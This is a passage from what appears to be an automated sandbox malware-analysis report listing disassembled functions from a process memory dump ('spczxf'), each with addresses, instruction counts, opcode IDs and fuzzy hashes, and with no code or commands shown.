                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249E6F Relevance: .2, Instructions: 234COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 206ad1531539aa644808785be2190c4a18bf4264925f3ce41406f7e8417b244d
                                                                                                                                                                                            • Instruction ID: a0f30f96f8bf4c64590d267320610a5109cc479822b0830787cc39e53c93b116
                                                                                                                                                                                            • Opcode Fuzzy Hash: 206ad1531539aa644808785be2190c4a18bf4264925f3ce41406f7e8417b244d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D71F48291F7C1CFF315A3A899161B87F91AF12214B0881FFC0C94B69BD81AD80D87D6
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC259860 Relevance: .2, Instructions: 233COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 93bec010bf10b78864ab78c2fea5fe430e7bfd878acaf37489db6b4e7d058926
                                                                                                                                                                                            • Instruction ID: f697db46263be97c8430627f731c18750e55f6c402d26cef5eb24346327c725b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 93bec010bf10b78864ab78c2fea5fe430e7bfd878acaf37489db6b4e7d058926
                                                                                                                                                                                            • Instruction Fuzzy Hash: EA610271A0894D8FDB98FB68D455ABA7BE1EF59700F04416DD00EC72A6CE24EC0ACB81
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249E90 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d3f475e957ec44a9d080c2442af4c0446d38be72802cc817377151e5dda672b7
                                                                                                                                                                                            • Instruction ID: 676dca1d331d4963c63ae17610cc461c09f1eeef7ec01571fd15056038529fd1
                                                                                                                                                                                            • Opcode Fuzzy Hash: d3f475e957ec44a9d080c2442af4c0446d38be72802cc817377151e5dda672b7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1951F48291F7C1CFF615A7A899161787FA1AF12610B4881FFD0C84B69BE816E80D87D7
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC2413F3 Relevance: .2, Instructions: 187COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 24baf55aca376397c1b3f3f98f38f5614db25a1fd2190afc6e1b6b599a865642
                                                                                                                                                                                            • Instruction ID: aa4b39c21556fa0cf190f0319f0949196ef56a000832fb693db478b37057219f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 24baf55aca376397c1b3f3f98f38f5614db25a1fd2190afc6e1b6b599a865642
                                                                                                                                                                                            • Instruction Fuzzy Hash: F751367271DA854FE395FB2CD4556A57BE1EFD9310B0480BAC04EC72A6CD28EC4E8380
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC2426C2 Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ab0da3f2fd9f74b56299e5037e37dfe388f190d93d8735555ae2218e06dbfd3f
                                                                                                                                                                                            • Instruction ID: 2538588d9e666c62c078deb190b76f2224dfefe43c326a7c9ebc732ec28de3e3
                                                                                                                                                                                            • Opcode Fuzzy Hash: ab0da3f2fd9f74b56299e5037e37dfe388f190d93d8735555ae2218e06dbfd3f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 83515E34E0951ECFEB94EB69C5552BD76E1FF89310F14817AD40DE3395CE28A84A8790
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24E2B0 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6744d0259159f043d40d8095f35914382f8fb11348ab8a55fc29ab5dddc8ba77
                                                                                                                                                                                            • Instruction ID: 87fa5eec87ba72a8baa93b348ba22a276daab48c70b94927691fd543505aef76
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6744d0259159f043d40d8095f35914382f8fb11348ab8a55fc29ab5dddc8ba77
                                                                                                                                                                                            • Instruction Fuzzy Hash: D041FB62B0E75A8FE31AA67C98511B57B91DB86320B0482BBD049C739BDD299C4A83C4
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A589 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 5f0596e6f9efcbb1d2cc3075017bf750b68494b7417c04fe920577bad5c122e2
                                                                                                                                                                                            • Instruction ID: d6b1d54c6c66b9bdb1b3b65e2e46ddf71c5fc19d9bd387bc49e0e865e02cdc30
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f0596e6f9efcbb1d2cc3075017bf750b68494b7417c04fe920577bad5c122e2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6941F611A0D68A8FF755A768D9592B83BD0EF56211F0481BBD04EC72D7DD08988D83C2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A1E0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e84f4b8fb108e514d25847d0f9cbd6de1a52e3861aab1283549513c73d0b4795
                                                                                                                                                                                            • Instruction ID: f30a7f82913137cd4ca0ad95220b5f59bb76dbc123163cb7c2f8779b8a22c30e
                                                                                                                                                                                            • Opcode Fuzzy Hash: e84f4b8fb108e514d25847d0f9cbd6de1a52e3861aab1283549513c73d0b4795
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4741E875A0AA49CFEB58FB78C4562B9BBE1EF4A310B04407ED00FD7296CE2998498751
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24AF98 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 7b003f45b5fdaf46ff017e3eaee0d73108f5ad5e58c83754bb15db8bf091cd86
                                                                                                                                                                                            • Instruction ID: 29b2aa4d99fe2d3c1452737ba4caa81cd2e751562b78ee9015fbf16684c4d4b7
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b003f45b5fdaf46ff017e3eaee0d73108f5ad5e58c83754bb15db8bf091cd86
                                                                                                                                                                                            • Instruction Fuzzy Hash: CE41263010DA958FF709AB28C415575BBE0FF57305B0445FED09ECB2A6DA2CD989C781
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24FAC8 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b22687435e1f2046e0ccb073017d9cee87a16a7b04e648f8b303fba6547192ea
                                                                                                                                                                                            • Instruction ID: 2f6390e995ea14d465b62a76aa3b764a0bbb5aa23eb9148779234a360320dd4d
                                                                                                                                                                                            • Opcode Fuzzy Hash: b22687435e1f2046e0ccb073017d9cee87a16a7b04e648f8b303fba6547192ea
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F418074906A1ECFDB94FF68C4596AABBF0FF29311B0105A9D40ED72B1DBB49C448B90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A234 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6216da45ac84dc19ffd09b92c4e9bd08f101dbf5162b3d238a4cfe36acbf7cc6
                                                                                                                                                                                            • Instruction ID: eb215d2157468e99ee2e278a0aa7e18c5408760e01c33005b691186fd3359be4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6216da45ac84dc19ffd09b92c4e9bd08f101dbf5162b3d238a4cfe36acbf7cc6
                                                                                                                                                                                            • Instruction Fuzzy Hash: C931A534B1AA4ACFEB58FB78D4521B9B7E1EF4A210B44417ED00FD7296CE2DA8458750
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24D66D Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6bef4f91a5659dd8c0ee74af7db41176bea771152a77f94e8abb8bae742b6a66
                                                                                                                                                                                            • Instruction ID: 15575398738027a4a4844c14222671a40c7b567fee13994e0758e6d90d7469d0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6bef4f91a5659dd8c0ee74af7db41176bea771152a77f94e8abb8bae742b6a66
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E31A43591991A8FEF88EF64C490AE977E1FF65304F1145A9C019DF2AACA34F54ACBC0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249D1D Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4db32e45f01dbd2eef9e599ff0c324ed662fdf465cf1909ea38b8f7a97e7506e
                                                                                                                                                                                            • Instruction ID: 5ee9576d1acea2656763b40847666cfb378f3c36737edfe63700b5e841f3feb3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4db32e45f01dbd2eef9e599ff0c324ed662fdf465cf1909ea38b8f7a97e7506e
                                                                                                                                                                                            • Instruction Fuzzy Hash: C6217B12B4EA955BD325B76CEC610E6BBA4EF8323AB0881BFD1CDC6153D805944E83C1
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24D1D8 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6142c1e5777a7997b5eb671e3dd6134a3708ee7a002f1b6ea8690cf18bb44047
                                                                                                                                                                                            • Instruction ID: 085c7f8a26627a7699e382b368b4d4a844af3eb95f9bb13910af99c7a1d608fd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6142c1e5777a7997b5eb671e3dd6134a3708ee7a002f1b6ea8690cf18bb44047
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6221A830A095468FFB59AB28C4859B6B791EF56310B1485F9D40DCF3ABD928E88AC7D0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A1BD Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d4ad9198ea3b2940067b1afd6409a2f55bf7e1960cecf796b61e202c255e3ded
                                                                                                                                                                                            • Instruction ID: ae6abfedefdc480fdf4b764dcb72ea425d7aba9b9982f225bed85775e877cee1
                                                                                                                                                                                            • Opcode Fuzzy Hash: d4ad9198ea3b2940067b1afd6409a2f55bf7e1960cecf796b61e202c255e3ded
                                                                                                                                                                                            • Instruction Fuzzy Hash: F021257190E789CFE745F77898192B83BE1EF4A311B0941B6D04DDB2A2DA28DC8D8791
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24A41D Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 9db7fb80538bb178f296fc42850fb0fd3027ba37a9169a3d1a0e799791fcf5cc
                                                                                                                                                                                            • Instruction ID: 648240cb0008b78f20021473bf545af02354bb578ae32151403d7049d6124961
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9db7fb80538bb178f296fc42850fb0fd3027ba37a9169a3d1a0e799791fcf5cc
                                                                                                                                                                                            • Instruction Fuzzy Hash: 16210771A0AB49CFD755FB7484161EEBBE0EF0A210B4541BFC00EDB3D2CA68A8498791
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249CB0 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d3f6ec47a0cff1379db0d1d0df20f0a263b13bb8784f080d649b82b8bd92769e
                                                                                                                                                                                            • Instruction ID: 717f1369eaf507225a457f9177271e1c37448e4f78698e490312ae190bc2faca
                                                                                                                                                                                            • Opcode Fuzzy Hash: d3f6ec47a0cff1379db0d1d0df20f0a263b13bb8784f080d649b82b8bd92769e
                                                                                                                                                                                            • Instruction Fuzzy Hash: E1112753B4E6945BE315727CEC610E57B94EF87239B0880BBD1CDC7263D809984E83D5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249DF8 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a27249f41a2e531c697c327f7289dc3836adf00b4563e377ec8083f42b9d0590
                                                                                                                                                                                            • Instruction ID: a34c7757bd9ce7324e770f9d99e6a8a517bd47864c9a429424c8c5f40a167fb3
                                                                                                                                                                                            • Opcode Fuzzy Hash: a27249f41a2e531c697c327f7289dc3836adf00b4563e377ec8083f42b9d0590
                                                                                                                                                                                            • Instruction Fuzzy Hash: 92210830A0A74DCFD755FB7498165AEBBE4EF4A210B0141BFD00EDB292CA6C68498751
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC240498 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 06873abf97f88c2cebb42e8b93615a5f2b55fcb5df2601c6a2ddf7cfe6a9a354
                                                                                                                                                                                            • Instruction ID: fd5f1c18e7dfc7819906b6e4f05e5b4c25a21347a3914923c80119cecb285572
                                                                                                                                                                                            • Opcode Fuzzy Hash: 06873abf97f88c2cebb42e8b93615a5f2b55fcb5df2601c6a2ddf7cfe6a9a354
                                                                                                                                                                                            • Instruction Fuzzy Hash: CA113632A0EB464FF365ABBA6C520767EC0EF8622471445FED05DC72D5D85D488A8281
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC249CE8 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b6ba6ee8df55ba0eb0d175aa573ba11a446497f435873b15b2c7519c9c25ca87
                                                                                                                                                                                            • Instruction ID: f7e63d01c0dd76daf1c9acd316c83a0b99e247243fdf8ba91d0cc27d9960d616
                                                                                                                                                                                            • Opcode Fuzzy Hash: b6ba6ee8df55ba0eb0d175aa573ba11a446497f435873b15b2c7519c9c25ca87
                                                                                                                                                                                            • Instruction Fuzzy Hash: D4014722B1E6589BE314723CB8910F577D4EF87229B0481BAE1CDC6263C815984A83C6
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC242B32 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a785d2cf54c51b510b6421ba38e1999063014a159253f3ebe2cf47e99bc9a276
                                                                                                                                                                                            • Instruction ID: 6cddd024e851c1031b0bcb5934221499ff48d33bbed24c00f8c065d62db89d43
                                                                                                                                                                                            • Opcode Fuzzy Hash: a785d2cf54c51b510b6421ba38e1999063014a159253f3ebe2cf47e99bc9a276
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D01D25094F7C24FE79763B849261A63ED28F8702070A40FFD489CB1A7D88E5C8F8392
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC24AF90 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: f652b0f4cb8add33010c33295732448f4e14e54f60e7edf67951ac4ae1021c65
                                                                                                                                                                                            • Instruction ID: a92fe836a565a13b0ddd2cc45f42732b68c64e72bd7222a765608cde6f88ce4c
                                                                                                                                                                                            • Opcode Fuzzy Hash: f652b0f4cb8add33010c33295732448f4e14e54f60e7edf67951ac4ae1021c65
                                                                                                                                                                                            • Instruction Fuzzy Hash: 21113031E0950ECBFB64EB58D5416FEB6F5EF45300F10803AE12DE2388CA34A9498BC5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC240833 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 201cd8a77cf1f3009edd2f5a2c796a436401713b25aef2f95ab6b4c41f5f7e5d
                                                                                                                                                                                            • Instruction ID: 58605caf64b2cc3990449cd1e0d72ba177320994c23d99912974ca86a8acbdd4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 201cd8a77cf1f3009edd2f5a2c796a436401713b25aef2f95ab6b4c41f5f7e5d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E119A9290F7C78FE3136B7489650E87FA0AF6321070941FAC4D88B1A7ED18A84DC3D2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00007FFAAC2493C9 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000008.00000002.1743126146.00007FFAAC240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC240000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_8_2_7ffaac240000_spczxf.jbxd
